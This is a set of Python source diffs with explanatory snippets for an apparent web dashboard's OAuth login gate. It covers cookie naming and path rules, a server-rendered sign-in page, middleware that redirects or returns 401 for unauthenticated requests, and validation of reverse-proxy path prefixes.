def refresh_session(self, *, refresh_token: str) -> Session: ...
@abstractmethod
def revoke_session(self, *, refresh_token: str) -> None: ...
def assert_protocol_compliance(cls: type) -> None:
"""Raise ``TypeError`` if ``cls`` doesn't fully implement the provider protocol.
Call this in every provider plugin's unit tests::
def test_protocol_compliance():
assert_protocol_compliance(MyProvider)
Returns ``None`` on success so callers can assert it explicitly.
"""
required_methods = (
"start_login",
"complete_login",
"verify_session",
"refresh_session",
"revoke_session",
)
required_attrs = ("name", "display_name")
for attr in required_attrs:
val = getattr(cls, attr, "")
if not val:
raise TypeError(
f"{cls.__name__} missing or empty attribute: {attr!r}"
)
for method in required_methods:
if not callable(getattr(cls, method, None)):
raise TypeError(f"{cls.__name__} missing method: {method}")
# Also catch the ABC-not-overridden case.
if getattr(cls, "__abstractmethods__", None):
raise TypeError(
f"{cls.__name__} has unimplemented abstract methods: "
f"{sorted(cls.__abstractmethods__)}"
)
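The exception docstrings above state how middleware translates each failure (``ProviderError`` to 503, ``InvalidCodeError`` to 400, ``RefreshExpiredError`` to a 302 redirect to ``/login``). A minimal sketch of that mapping follows; the exception classes are local stand-ins so the block runs on its own, and ``response_for`` is a hypothetical helper rather than the real middleware code.

```python
from typing import Optional, Tuple


# Local stand-ins for the exceptions defined in this module.
class ProviderError(Exception):
    pass


class InvalidCodeError(Exception):
    pass


class RefreshExpiredError(Exception):
    pass


def response_for(exc: Exception) -> Tuple[int, Optional[str]]:
    """Hypothetical mapping: return (status_code, redirect_location)."""
    if isinstance(exc, InvalidCodeError):
        return 400, None  # bad OAuth callback code / state
    if isinstance(exc, RefreshExpiredError):
        return 302, "/login"  # caller should also clear the session cookies
    if isinstance(exc, ProviderError):
        return 503, None  # IDP unreachable or other transient failure
    raise exc  # anything else is not an auth-provider failure


if __name__ == "__main__":
    for error in (InvalidCodeError(), RefreshExpiredError(), ProviderError()):
        print(type(error).__name__, response_for(error))
```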
@@ -0,0 +1,234 @@
"""Cookie helpers for dashboard auth.
Three cookies in play:
- hermes_session_at: the OAuth access token
(HttpOnly, lifetime = token TTL)
- hermes_session_rt: the OAuth refresh token
(HttpOnly, lifetime = 30 days)
**DEPRECATED in OAuth contract v1**: Nous Portal
does not issue refresh tokens; we keep the cookie
name and clear semantics for forward compatibility
and to flush stale cookies from old browsers.
- hermes_session_pkce: short-lived PKCE state + CSRF nonce + provider
hint (HttpOnly, lifetime = 10 minutes)
All three are ``SameSite=Lax`` (browser will send on cross-site GET
top-level navigation, which we need for the IDP redirect back to
``/auth/callback``) and live under the prefix's Path. ``Secure`` is set
ONLY when the dashboard was reached over HTTPS, detected via the
request URL scheme, which honours ``X-Forwarded-Proto`` upstream of
Fly's TLS terminator when uvicorn is configured with
``proxy_headers=True``. Loopback dev traffic is always HTTP so
``Secure`` would lock the cookies out of the browser.
Cookie prefix selection (browser hardening per
https://datatracker.ietf.org/doc/html/draft-west-cookie-prefixes):
* Loopback HTTP -> bare name. ``__Host-`` / ``__Secure-`` require
``Secure``, which is incompatible with HTTP.
* Gated HTTPS, direct deploy (Path=/) -> ``__Host-`` prefix. Binds the
cookie to the exact origin (no Domain attribute): strongest spec
guarantee.
* Gated HTTPS, behind a reverse-proxy prefix (Path=/hermes) ->
``__Secure-`` prefix. ``__Host-`` is disallowed when Path != "/";
``__Secure-`` keeps the Secure-required hardening without the
Path constraint, and the explicit ``Path=/hermes`` covers
same-origin app isolation.
The setters and readers BOTH consult the active prefix because the
cookie *name* changes: a reader that looked up the bare name when the
setter wrote ``__Secure-hermes_session_at`` would never find the value.
.. deprecated:: contract v1
``set_session_cookies`` accepts ``refresh_token=""`` (the contract-v1
default) and silently skips writing the RT cookie in that case.
``clear_session_cookies`` still emits a Max-Age=0 deletion for the RT
cookie so users carrying a stale cookie from an earlier deployment get
it cleared on logout / session expiry. The full refresh-flow machinery
was rewritten as "401 → redirect to /login" in Phase 6.
"""
from __future__ import annotations
from typing import Optional, Tuple
from fastapi import Request
from fastapi.responses import Response
# Bare cookie names — the request-scoped ``_resolved_name`` helper
# decides whether to prepend ``__Host-`` / ``__Secure-`` based on the
# request's HTTPS + prefix combination.
SESSION_AT_COOKIE = "hermes_session_at"
SESSION_RT_COOKIE = "hermes_session_rt"
PKCE_COOKIE = "hermes_session_pkce"
# Possible name variants we may have to read back. Sorted so most-strict
# wins on iteration when both happen to be present (shouldn't happen in
# practice — a single request emits exactly one variant).
_NAME_VARIANTS = ("__Host-", "__Secure-", "")
# 30 days — matches Portal's REFRESH_TOKEN_TTL_SECONDS
_RT_MAX_AGE = 30 * 24 * 60 * 60
_PKCE_MAX_AGE = 10 * 60
def _resolved_name(bare: str, *, use_https: bool, prefix: str) -> str:
"""Pick the cookie-prefix variant for the active request shape.
See module docstring for the prefix selection rules. Mismatch
between setter and reader would silently break sessions, so this
function is the single source of truth for naming.
"""
if not use_https:
return bare
if prefix:
# Path != "/" forbids __Host-; fall back to __Secure-.
return f"__Secure-{bare}"
return f"__Host-{bare}"
def _cookie_path(prefix: str) -> str:
"""Cookie ``Path`` attribute for the active deploy shape.
Under ``X-Forwarded-Prefix: /hermes`` we want ``Path=/hermes`` so:
a) the browser sends the cookie back on requests under the prefix
(browsers omit the cookie if request path doesn't start with
Path);
b) the cookie doesn't leak to other apps on the same origin
(``mission-control.tilos.com/billing/...``).
Direct-deploy (no proxy prefix) gets ``Path=/``.
"""
return prefix if prefix else "/"
def _common_attrs(*, use_https: bool, prefix: str) -> dict:
attrs: dict = {
"httponly": True,
"samesite": "lax",
"path": _cookie_path(prefix),
}
if use_https:
attrs["secure"] = True
return attrs
def set_session_cookies(
response: Response,
*,
access_token: str,
refresh_token: str,
access_token_expires_in: int,
use_https: bool,
prefix: str = "",
) -> None:
"""Set the session cookies on the response.
``access_token_expires_in`` is in seconds. Use the provider's reported
TTL for the access token.
``refresh_token`` is accepted for backward / forward compatibility but
SKIPPED when empty: Nous Portal contract v1 issues no refresh tokens,
so a ``Session.refresh_token == ""`` from the provider means we don't
persist anything. If a future contract revision starts emitting refresh
tokens, this helper will write the RT cookie again with no other change.
``prefix`` is the normalised X-Forwarded-Prefix value (e.g. ``/hermes``)
or ``""`` for a direct deploy. It influences both the cookie name
(``__Host-`` vs ``__Secure-`` vs bare) and the ``Path`` attribute.
"""
response.set_cookie(
_resolved_name(SESSION_AT_COOKIE, use_https=use_https, prefix=prefix),
access_token,
max_age=access_token_expires_in,
**_common_attrs(use_https=use_https, prefix=prefix),
)
# Contract v1: empty refresh token means "don't persist RT cookie".
# Keeping a literal empty-value cookie around would be dead state at
# best, attack surface at worst.
if refresh_token:
response.set_cookie(
_resolved_name(SESSION_RT_COOKIE, use_https=use_https, prefix=prefix),
refresh_token,
max_age=_RT_MAX_AGE,
**_common_attrs(use_https=use_https, prefix=prefix),
)
def clear_session_cookies(response: Response, *, prefix: str = "") -> None:
"""Emit Max-Age=0 deletions for both session cookies.
To delete a cookie reliably the deletion's ``Path`` must match the
set path AND the cookie name must match the variant the setter used.
We don't know which variant was originally set (cookie prefix
depends on the request that set it), so we emit deletions for every
plausible variant under the active path.
"""
path = _cookie_path(prefix)
for variant in _NAME_VARIANTS:
response.set_cookie(
f"{variant}{SESSION_AT_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
response.set_cookie(
f"{variant}{SESSION_RT_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
def set_pkce_cookie(
response: Response, *, payload: str, use_https: bool, prefix: str = "",
) -> None:
response.set_cookie(
_resolved_name(PKCE_COOKIE, use_https=use_https, prefix=prefix),
payload,
max_age=_PKCE_MAX_AGE,
**_common_attrs(use_https=use_https, prefix=prefix),
)
def clear_pkce_cookie(response: Response, *, prefix: str = "") -> None:
path = _cookie_path(prefix)
for variant in _NAME_VARIANTS:
response.set_cookie(
f"{variant}{PKCE_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
def _read_with_fallback(
request: Request, bare_name: str,
) -> Optional[str]:
"""Read a cookie by checking every prefix variant in order.
The setter chooses one variant based on the active request shape;
the reader doesn't know which one fired (the request that READS
the cookie may not be the same shape as the request that SET it
in pathological cases). Trying all three guarantees we find it.
"""
for variant in _NAME_VARIANTS:
value = request.cookies.get(f"{variant}{bare_name}")
if value is not None:
return value
return None
def read_session_cookies(request: Request) -> Tuple[Optional[str], Optional[str]]:
"""Returns (access_token, refresh_token), either may be None."""
at = _read_with_fallback(request, SESSION_AT_COOKIE)
rt = _read_with_fallback(request, SESSION_RT_COOKIE)
return at, rt
def read_pkce_cookie(request: Request) -> Optional[str]:
return _read_with_fallback(request, PKCE_COOKIE)
def detect_https(request: Request) -> bool:
"""Decide whether to set the ``Secure`` cookie flag.
Reads ``request.url.scheme``. Under uvicorn's ``proxy_headers=True``
(which start_server enables when the gate is active), this honours
``X-Forwarded-Proto`` from Fly's TLS terminator. Loopback traffic is
always HTTP so this returns False there.
"""
return request.url.scheme == "https"
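To make the naming rules concrete, here is a standalone sketch of the three deploy shapes and the fallback read. It restates the logic of ``_resolved_name``, ``_cookie_path`` and ``_read_with_fallback`` against a plain dict instead of a FastAPI ``Request``; the un-underscored function names are illustrative copies, not exports of this module.

```python
from typing import Mapping, Optional

_NAME_VARIANTS = ("__Host-", "__Secure-", "")


def resolved_name(bare: str, *, use_https: bool, prefix: str) -> str:
    if not use_https:
        return bare  # prefixed names require Secure, impossible over HTTP
    if prefix:
        return f"__Secure-{bare}"  # Path != "/" rules out __Host-
    return f"__Host-{bare}"


def cookie_path(prefix: str) -> str:
    return prefix if prefix else "/"


def read_with_fallback(cookies: Mapping[str, str], bare: str) -> Optional[str]:
    # Most-strict variant first, bare name last.
    for variant in _NAME_VARIANTS:
        value = cookies.get(f"{variant}{bare}")
        if value is not None:
            return value
    return None


if __name__ == "__main__":
    shapes = [(False, ""), (True, ""), (True, "/hermes")]
    for use_https, prefix in shapes:
        name = resolved_name("hermes_session_at", use_https=use_https, prefix=prefix)
        print(f"https={use_https} prefix={prefix!r} -> {name}; Path={cookie_path(prefix)}")
    print(read_with_fallback({"__Secure-hermes_session_at": "tok"}, "hermes_session_at"))
```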
@@ -0,0 +1,384 @@
"""Server-rendered /login page.
No React, no JavaScript dependency. Listed providers come from the
registry; clicking a provider sends a GET to
``/auth/login?provider=<name>``.
Visual styling mirrors the Nous Research design system (the
``@nous-research/ui`` package the React dashboard uses): the same
``Collapse`` / ``Rules Compressed`` typeface, amber-on-dark colour
tokens (``#170d02`` / ``#ffac02`` / ``#fff``), uppercase + wide-tracking
brand chrome, and the inset-bevel button shadow. Fonts are served
out of the SPA's ``/fonts/`` directory which the dashboard-auth gate
already allowlists pre-auth (see ``_GATE_PUBLIC_PREFIXES`` in
``middleware.py``), so the page renders without needing the React
bundle loaded.
Test-stable class names: the existing test suite extracts the
``class="provider-btn"`` anchor href to walk the OAuth flow. That
class name MUST NOT change without updating
``tests/hermes_cli/test_dashboard_auth_401_reauth.py``.
"""
from __future__ import annotations
import html
from hermes_cli.dashboard_auth import list_providers
# Inline minimal CSS. The dashboard's full skin lives in the React
# bundle, which we deliberately do NOT load here — the login page must
# not depend on the SPA build being present or on the injected session
# token.
#
# Single curly braces are placeholders for ``str.format``; CSS curlies
# are doubled (``{{`` / ``}}``).
_LOGIN_HTML_TEMPLATE = """\
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sign in Hermes Agent</title>
<style>
/* Brand fonts shipped by @nous-research/ui: same files the SPA loads. */
@font-face {{
font-family: 'Collapse';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/Collapse-Regular.woff2') format('woff2');
}}
@font-face {{
font-family: 'Collapse';
font-style: normal;
font-weight: 700;
font-display: swap;
src: url('/fonts/Collapse-Bold.woff2') format('woff2');
}}
@font-face {{
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/RulesCompressed-Regular.woff2') format('woff2');
}}
@font-face {{
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 600;
font-display: swap;
src: url('/fonts/RulesCompressed-Medium.woff2') format('woff2');
}}
:root {{
--background-base: #170d02;
--background: #170d02;
--midground: #ffac02;
--foreground: #ffffff;
--hairline: color-mix(in srgb, #ffac02 18%, transparent);
--hairline-strong: color-mix(in srgb, #ffac02 35%, transparent);
}}
*, *::before, *::after {{ box-sizing: border-box; }}
html, body {{
margin: 0;
padding: 0;
min-height: 100%;
background: var(--background-base);
color: var(--foreground);
font-family: 'Collapse', system-ui, -apple-system, "Segoe UI", Roboto, sans-serif;
font-size: 16px;
line-height: 1.5;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}}
/* Subtle dot-grid backdrop: DS idiom (see `.dither` in globals.css). */
body {{
background-image:
radial-gradient(
ellipse at top,
color-mix(in srgb, var(--midground) 6%, transparent) 0%,
transparent 55%
),
repeating-conic-gradient(
color-mix(in srgb, var(--midground) 4%, transparent) 0% 25%,
transparent 0% 50%
);
background-size: auto, 3px 3px;
background-attachment: fixed;
}}
/* Layout: vertically center on tall screens, top-anchor on short. */
body {{
display: grid;
place-items: center;
padding: clamp(1.5rem, 6vh, 6rem) 1.25rem;
}}
main {{
width: 100%;
max-width: 26rem;
position: relative;
animation: slide-up 0.6s ease-out both;
}}
@keyframes slide-up {{
from {{ opacity: 0; transform: translateY(6px); }}
to {{ opacity: 1; transform: translateY(0); }}
}}
@media (prefers-reduced-motion: reduce) {{
main {{ animation: none; }}
}}
/* Brand wordmark above the card: same uppercase + wide-tracking
idiom DS Buttons use. */
.brand {{
text-align: center;
margin-bottom: 1.75rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600;
font-size: 1.05rem;
letter-spacing: 0.32em;
text-transform: uppercase;
color: var(--midground);
}}
.brand .dot {{
display: inline-block;
width: 6px;
height: 6px;
background: var(--midground);
margin: 0 0.55em 0.18em;
vertical-align: middle;
border-radius: 1px;
}}
.card {{
position: relative;
padding: 2.25rem 2rem 2rem;
background: color-mix(in srgb, #ffffff 2%, var(--background-base));
border: 1px solid var(--hairline);
/* Hairline highlight + bevel shadow matches DS Button SHADOW_DEFAULT
(`inset -1px -1px 0 #00000080, inset 1px 1px 0 #ffffff80`) at panel scale. */
box-shadow:
inset 1px 1px 0 0 color-mix(in srgb, #ffffff 5%, transparent),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.4),
0 24px 60px -20px rgba(0, 0, 0, 0.6);
}}
h1 {{
margin: 0 0 0.4rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600;
font-size: 1.85rem;
letter-spacing: 0.05em;
text-transform: uppercase;
color: var(--foreground);
}}
.subtitle {{
margin: 0 0 1.75rem;
color: color-mix(in srgb, var(--foreground) 65%, transparent);
font-size: 0.95rem;
}}
.provider-list {{
display: grid;
gap: 0.75rem;
}}
/* Provider button mirrors DS Button (default variant):
amber surface, dark text, uppercase + wide tracking, inset bevel. */
.provider-btn {{
display: block;
width: 100%;
box-sizing: border-box;
padding: 0.95rem 1rem;
text-align: center;
background: var(--midground);
color: var(--background-base);
font-family: 'Collapse', sans-serif;
font-weight: 700;
font-size: 0.78rem;
letter-spacing: 0.2em;
text-transform: uppercase;
text-decoration: none;
border: 0;
border-radius: 0; /* DS Button is squared: no rounded corners. */
cursor: pointer;
box-shadow:
inset 1px 1px 0 0 rgba(255, 255, 255, 0.5),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.5);
transition: filter 0.12s ease-out;
}}
.provider-btn:hover {{
filter: brightness(1.08);
}}
.provider-btn:active {{
/* DS Button uses `active:invert` on the default surface. */
filter: invert(1);
}}
.provider-btn:focus-visible {{
outline: 2px solid var(--midground);
outline-offset: 3px;
}}
footer {{
margin-top: 1.75rem;
text-align: center;
color: color-mix(in srgb, var(--foreground) 45%, transparent);
font-size: 0.75rem;
letter-spacing: 0.1em;
text-transform: uppercase;
line-height: 1.7;
}}
footer .sep {{
display: inline-block;
width: 1.5rem;
height: 1px;
background: var(--hairline-strong);
vertical-align: middle;
margin: 0 0.6em 0.2em;
}}
/* Selection: DS uses midground bg + background text. */
::selection {{
background: var(--midground);
color: var(--background-base);
}}
</style>
</head>
<body>
<main>
<div class="brand">Nous<span class="dot"></span>Research</div>
<div class="card">
<h1>Sign in</h1>
<p class="subtitle">Choose a sign-in method to continue to the Hermes Agent dashboard.</p>
<div class="provider-list">
{provider_buttons}
</div>
</div>
<footer>
<span class="sep"></span>Public bind &middot; Auth required<span class="sep"></span>
</footer>
</main>
</body>
</html>
"""
_EMPTY_HTML = """\
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sign-in unavailable Hermes Agent</title>
<style>
@font-face {
font-family: 'Collapse';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/Collapse-Regular.woff2') format('woff2');
}
@font-face {
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 600;
font-display: swap;
src: url('/fonts/RulesCompressed-Medium.woff2') format('woff2');
}
:root {
--background-base: #170d02;
--midground: #ffac02;
--foreground: #ffffff;
--hairline: color-mix(in srgb, #ffac02 18%, transparent);
}
*, *::before, *::after { box-sizing: border-box; }
html, body {
margin: 0; padding: 0; min-height: 100%;
background: var(--background-base);
color: var(--foreground);
font-family: 'Collapse', system-ui, -apple-system, "Segoe UI", Roboto, sans-serif;
font-size: 16px; line-height: 1.5;
-webkit-font-smoothing: antialiased;
}
body {
display: grid; place-items: center;
padding: clamp(1.5rem, 6vh, 6rem) 1.25rem;
}
main {
width: 100%; max-width: 32rem;
padding: 2.25rem 2rem;
background: color-mix(in srgb, #ffffff 2%, var(--background-base));
border: 1px solid var(--hairline);
box-shadow:
inset 1px 1px 0 0 color-mix(in srgb, #ffffff 5%, transparent),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.4),
0 24px 60px -20px rgba(0, 0, 0, 0.6);
}
h1 {
margin: 0 0 1rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600; font-size: 1.5rem;
letter-spacing: 0.05em; text-transform: uppercase;
color: var(--midground);
}
p { margin: 0 0 1rem; }
code {
background: var(--midground);
color: var(--background-base);
padding: 0.1em 0.35em;
font-family: 'Courier New', monospace;
font-size: 0.9em;
}
</style>
</head>
<body>
<main>
<h1>Sign-in unavailable</h1>
<p>This dashboard is bound to a non-loopback host but no authentication
providers are installed.</p>
<p>Install <code>plugins/dashboard-auth-nous</code> (default) or another
auth provider, or restart with <code>--insecure</code> to bypass the
auth gate (not recommended on untrusted networks).</p>
</main>
</body>
</html>
"""
def render_login_html(*, next_path: str = "") -> str:
"""Return the full HTML for ``GET /login``.
``next_path``: when set, the post-login landing path the user
originally requested. Threaded into each provider button's ``href``
as a ``next=`` query parameter so the OAuth round trip carries it
end-to-end. The caller (``routes.login_page``) is responsible for
validating ``next_path`` against the same-origin rules before we
emit it; we still HTML-escape it as defence in depth.
"""
providers = list_providers()
if not providers:
return _EMPTY_HTML
if next_path:
# URL-encode then HTML-escape. The URL-encode step matches the
# gate's ``_safe_next_target`` output shape (also URL-encoded),
# so a value that round-tripped from /login?next=... back into
# the button href is byte-identical.
from urllib.parse import quote
next_qs = f"&next={html.escape(quote(next_path, safe=''), quote=True)}"
else:
next_qs = ""
buttons = []
for p in providers:
buttons.append(
f' <a class="provider-btn" '
f'href="/auth/login?provider={html.escape(p.name, quote=True)}{next_qs}">'
f'Sign in with {html.escape(p.display_name)}</a>'
)
return _LOGIN_HTML_TEMPLATE.format(provider_buttons="\n".join(buttons))
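The two-step encoding of ``next_path`` can be tried in isolation. The sketch below is a minimal illustration using only the standard library; ``build_next_qs`` is a hypothetical helper name, not part of the module above. It shows why the order is URL-encode first, then HTML-escape.

```python
import html
from urllib.parse import quote, unquote


def build_next_qs(next_path: str) -> str:
    """Hypothetical helper mirroring the next= handling in render_login_html."""
    if not next_path:
        return ""
    # safe="" percent-encodes "/", "?" and "&" too, so the whole target
    # travels as one opaque query value.
    encoded = quote(next_path, safe="")
    # HTML-escape afterwards so the value is safe inside href="...".
    return f"&next={html.escape(encoded, quote=True)}"


original = "/sessions?page=2&sort=desc"
qs = build_next_qs(original)
print(qs)
# Decoding the value recovers the original path and query unchanged.
print(unquote(qs[len("&next="):]) == original)
```

Because the percent-encoded form contains no ``&``, ``<``, ``>`` or quote characters, the HTML-escape step leaves it untouched here; it only matters as a second line of defence.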
@@ -0,0 +1,207 @@
"""Auth-gate middleware for the dashboard.
Engaged when ``app.state.auth_required is True``. The gate's job:
1. Allow a small set of routes through unauthenticated (login page,
``/auth/*`` OAuth round trip, ``/api/auth/providers``, static
assets).
2. For everything else, demand a valid session cookie and attach the
verified :class:`Session` to ``request.state.session``.
3. On HTML routes, redirect missing/invalid cookies to ``/login``.
On ``/api/*`` routes, return 401 JSON.
The middleware is a no-op when ``auth_required`` is False (loopback
mode); the legacy ``_SESSION_TOKEN`` ``auth_middleware`` handles those
binds.
"""
from __future__ import annotations
import logging
from typing import Awaitable, Callable
from fastapi import Request
from fastapi.responses import JSONResponse, RedirectResponse, Response
from hermes_cli.dashboard_auth import list_providers
from hermes_cli.dashboard_auth.audit import AuditEvent, audit_log
from hermes_cli.dashboard_auth.base import ProviderError
from hermes_cli.dashboard_auth.cookies import read_session_cookies
_log = logging.getLogger(__name__)
# Paths that bypass the auth gate. Order matters: prefix match.
_GATE_PUBLIC_PREFIXES: tuple[str, ...] = (
"/auth/login",
"/auth/callback",
"/auth/logout",
"/login",
"/api/auth/providers",
"/assets/",
"/favicon.ico",
"/ds-assets/",
"/fonts/",
"/fonts-terminal/",
)
def _path_is_public(path: str) -> bool:
return any(
path == prefix or path.startswith(prefix)
for prefix in _GATE_PUBLIC_PREFIXES
)
def _client_ip(request: Request) -> str:
fwd = request.headers.get("x-forwarded-for", "")
if fwd:
return fwd.split(",")[0].strip()
return request.client.host if request.client else ""
def _unauth_response(request: Request, *, reason: str) -> Response:
"""API routes → 401 JSON with ``login_url``; HTML routes → 302 → /login.
The JSON envelope carries a ``login_url`` field with a ``next=`` query
string so the SPA's global 401 handler can drop the user back where
they were after re-auth. The contract is intentionally simple so any
fetch-wrapper can implement the redirect without parsing details:
if response.status === 401 && body.error in ("unauthenticated",
"session_expired"):
window.location.assign(body.login_url);
HTML redirects also carry the ``next=`` query string so direct
navigation to ``/sessions`` (etc.) without a cookie comes back to
``/sessions`` after login.
Under a reverse proxy with ``X-Forwarded-Prefix: /hermes``, the
``login_url`` is prefixed (``/hermes/login?next=...``) so the
browser's window.location.assign / Location: follow lands on the
proxied login page rather than the bare ``/login`` (which the
proxy doesn't route to the dashboard).
"""
from hermes_cli.dashboard_auth.prefix import prefix_from_request
path = request.url.path
next_param = _safe_next_target(request)
prefix = prefix_from_request(request)
login_url = (
f"{prefix}/login?next={next_param}" if next_param
else f"{prefix}/login"
)
if path.startswith("/api/"):
# API routes never get redirects: the browser fetch() API would
# follow a 302 into the cross-origin OAuth dance opaquely. Return
# 401 with a structured envelope so the SPA can full-page-navigate
# to login_url.
error_code = (
"session_expired"
if reason == "invalid_or_expired_session"
else "unauthenticated"
)
return JSONResponse(
{
"error": error_code,
"detail": "Unauthorized",
"reason": reason,
"login_url": login_url,
},
status_code=401,
)
return RedirectResponse(url=login_url, status_code=302)
def _safe_next_target(request: Request) -> str:
"""Build the URL-encoded ``next`` query value, or empty string.
Only same-origin relative paths are accepted; absolute URLs or
``//evil.com`` open-redirect attempts are silently dropped. The empty
string return means the caller produces a bare ``/login`` URL, which is
fine: the user lands at the dashboard root after re-auth.
"""
path = request.url.path
# Reject anything that doesn't start with "/" or starts with "//"
# (protocol-relative URL — would open-redirect to an attacker host).
if not path or not path.startswith("/") or path.startswith("//"):
return ""
# Don't redirect back to the auth routes themselves — that loops.
if any(
path == p or path.startswith(p)
for p in ("/login", "/auth/", "/api/auth/")
):
return ""
# Preserve query string if present (e.g. /sessions?page=2).
query = request.url.query
target = f"{path}?{query}" if query else path
# urlencode the whole thing as a single value.
from urllib.parse import quote
return quote(target, safe="")
async def gated_auth_middleware(
request: Request,
call_next: Callable[[Request], Awaitable[Response]],
) -> Response:
"""Engaged only when ``app.state.auth_required is True``.
No-op pass-through in loopback mode so the legacy auth_middleware can
handle those binds via ``_SESSION_TOKEN``.
"""
if not getattr(request.app.state, "auth_required", False):
return await call_next(request)
path = request.url.path
if _path_is_public(path):
return await call_next(request)
at, _rt = read_session_cookies(request)
if not at:
return _unauth_response(request, reason="no_cookie")
# Try every registered provider's verify_session in turn. Providers
# MUST return None for tokens they don't recognise (not raise). This
# lets multiple providers stack — the first one that recognises a
# token wins.
session = None
for provider in list_providers():
try:
session = provider.verify_session(access_token=at)
except ProviderError as e:
_log.warning(
"dashboard-auth: provider %r unreachable during verify: %s",
provider.name, e,
)
audit_log(
AuditEvent.SESSION_VERIFY_FAILURE,
provider=provider.name,
reason="provider_unreachable",
ip=_client_ip(request),
)
return JSONResponse(
{"detail": f"Auth provider {provider.name!r} unreachable"},
status_code=503,
)
if session is not None:
break
if session is None:
audit_log(
AuditEvent.SESSION_VERIFY_FAILURE,
reason="no_provider_recognises",
ip=_client_ip(request),
)
response = _unauth_response(request, reason="invalid_or_expired_session")
# Clear the dead cookie so the browser doesn't keep sending it.
# Contract v1: no refresh token to retry with, so the only correct
# next step is full re-auth via /login. Importing locally avoids a
# cycle with cookies → middleware at module load. Pass the active
# prefix so the deletion's Path matches the set-Path (otherwise
# the browser ignores it).
from hermes_cli.dashboard_auth.cookies import clear_session_cookies
from hermes_cli.dashboard_auth.prefix import prefix_from_request
clear_session_cookies(response, prefix=prefix_from_request(request))
return response
request.state.session = session
return await call_next(request)
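The "first provider that recognises the token wins" rule can be sketched without FastAPI. Everything below is a hypothetical stand-in (``FakeProvider``, ``FakeSession``, ``first_recognising`` are illustrative names); it assumes only the contract stated above, namely that ``verify_session`` returns ``None`` for tokens a provider does not recognise.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional, Sequence


@dataclass
class FakeSession:
    user_id: str
    provider: str


class FakeProvider:
    """Hypothetical provider that knows a fixed token -> user_id mapping."""

    def __init__(self, name: str, known: dict) -> None:
        self.name = name
        self._known = known

    def verify_session(self, *, access_token: str) -> Optional[FakeSession]:
        user_id = self._known.get(access_token)
        if user_id is None:
            return None  # unknown token: return None, do not raise
        return FakeSession(user_id=user_id, provider=self.name)


def first_recognising(
    providers: Sequence[FakeProvider], access_token: str
) -> Optional[FakeSession]:
    # Ask each provider in registration order; stop at the first hit.
    for provider in providers:
        session = provider.verify_session(access_token=access_token)
        if session is not None:
            return session
    return None


stack = [FakeProvider("a", {"t1": "u1"}), FakeProvider("b", {"t2": "u2"})]
print(first_recognising(stack, "t2"))
print(first_recognising(stack, "unknown"))
```

A ``None`` result from the whole stack corresponds to the ``no_provider_recognises`` branch in the middleware, which clears the cookie and sends the user back to login.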
@@ -0,0 +1,157 @@
"""Helpers for X-Forwarded-Prefix support.
Mission-control style deploys reverse-proxy the dashboard at a path
prefix (e.g. ``mission-control.tilos.com/hermes/*`` -> dashboard on
:9119), injecting ``X-Forwarded-Prefix: /hermes`` so the backend can
reconstruct prefixed URLs (Location: headers, OAuth redirect_uri,
cookie Path attributes, SPA asset URLs).
This module is also the home of the ``HERMES_DASHBOARD_PUBLIC_URL`` /
``dashboard.public_url`` resolution: when the operator declares a
complete public URL (scheme + host + optional path prefix), we use
that directly for the OAuth ``redirect_uri`` and skip the
X-Forwarded-Prefix reconstruction. This is a relief valve for deploys
where the proxy header chain isn't reliable.
The single source of truth for both helpers lives here so the gate
middleware, the OAuth routes, the cookie helpers, and the SPA mount
all agree on validation rules.
"""
from __future__ import annotations
import logging
import os
import urllib.parse
from typing import Optional
_log = logging.getLogger(__name__)
# Characters that, if present in a public_url or prefix value, indicate
# either a typo or a header-injection attempt. Reject the whole value
# rather than try to sanitise — the operator can fix their config.
_REJECT_CHARS = frozenset(('"', "'", "<", ">", " ", "\n", "\r", "\t"))
def normalise_prefix(raw: Optional[str]) -> str:
"""Normalise an X-Forwarded-Prefix header value.
Returns a string like ``"/hermes"`` (no trailing slash) or ``""``
when no prefix is set / the header is malformed. We deliberately
reject anything containing ``..``, ``//``, quotes, angle brackets, or
whitespace (including newlines and tabs), and anything longer than 64
characters, so a hostile proxy can't inject HTML or path-traversal
sequences via the prefix.
"""
if not raw:
return ""
p = raw.strip()
if not p:
return ""
if not p.startswith("/"):
p = "/" + p
p = p.rstrip("/")
if (
"//" in p
or ".." in p
or any(c in p for c in _REJECT_CHARS)
):
return ""
if len(p) > 64:
return ""
return p
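To see the normalisation rules on concrete inputs, the following standalone restatement can be run outside the package. It is a sketch that copies the logic shown above rather than importing it; the sample values are made up for illustration.

```python
from typing import Optional

_REJECT_CHARS = frozenset('"\'<> \n\r\t')


def normalise_prefix(raw: Optional[str]) -> str:
    """Standalone restatement of the rules above, for experimentation."""
    p = (raw or "").strip()
    if not p:
        return ""
    if not p.startswith("/"):
        p = "/" + p
    p = p.rstrip("/")
    if "//" in p or ".." in p or any(c in p for c in _REJECT_CHARS):
        return ""
    return p if len(p) <= 64 else ""


samples = ["hermes/", "/hermes", "/a/../b", "/a//b", "/x<script>", "/" + "a" * 64]
for sample in samples:
    print(repr(sample), "->", repr(normalise_prefix(sample)))
```

Only the first two samples survive, both as ``/hermes``; the rest collapse to the empty string, which callers treat as "no prefix".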
def prefix_from_request(request) -> str:
"""Convenience wrapper that reads the header off a Starlette/FastAPI
Request and normalises it. Returns ``""`` when no prefix.
"""
return normalise_prefix(request.headers.get("x-forwarded-prefix"))
# ---------------------------------------------------------------------------
